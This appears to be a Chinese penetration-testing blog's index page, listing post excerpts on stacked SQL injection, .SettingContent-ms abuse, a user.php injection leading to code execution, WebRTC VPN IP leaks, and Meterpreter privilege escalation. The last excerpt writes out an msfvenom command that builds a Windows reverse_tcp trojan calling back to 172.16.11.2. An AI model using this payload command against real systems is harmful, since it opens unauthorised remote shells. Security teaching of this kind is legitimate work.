该文被密码保护。
posted @ 2018-09-30 15:38 渗透测试中心 阅读(1) 评论(0) 编辑
该文被密码保护。
posted @ 2018-09-29 02:12 渗透测试中心 阅读(2) 评论(0) 编辑
摘要: 0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 s阅读全文
posted @ 2018-09-29 01:57 渗透测试中心 阅读(45) 评论(0) 编辑
摘要: 0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型,它的内容是XML格式进行编写的,主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件,系统并未判断该阅读全文
posted @ 2018-09-13 18:24 渗透测试中心 阅读(107) 评论(0) 编辑
摘要: 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来阅读全文
posted @ 2018-09-13 18:13 渗透测试中心 阅读(48) 评论(0) 编辑
摘要: 0x00 BGP(RFC 1771、 RFC 4271)定义 全称是Border Gateway Protocol, 对应中文是边界网关协议,最新版本是BGPv4。 BGP是互联网上一个核心的互联网去中心化自治路由协议。它的地位是核心的毫不夸张地说, 是目前唯一连接海陆空和7大洲4大洋的外部路由协议阅读全文
posted @ 2018-08-28 09:50 渗透测试中心 阅读(209) 评论(0) 编辑
摘要: 0x00 VPN泄漏本地IP 最近爆出VPN可以被准确地测出浏览者的真实IP地址,这被称为WebRTC特征。只要到这个网页就可以测试你的VPN是否泄露的真实IP。 https://diafygi.github.io/webrtc-ips/ 来示范通过 JS 获取代理用户的真实 IP 地址, 为了大家阅读全文
posted @ 2018-08-23 10:41 渗透测试中心 阅读(4) 评论(0) 编辑
该文被密码保护。
posted @ 2018-08-16 03:07 渗透测试中心 阅读(2) 评论(0) 编辑
该文被密码保护。
posted @ 2018-08-16 03:05 渗透测试中心 阅读(2) 评论(0) 编辑
摘要: 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe阅读全文
posted @ 2018-08-16 03:03 渗透测试中心 阅读(383) 评论(0) 编辑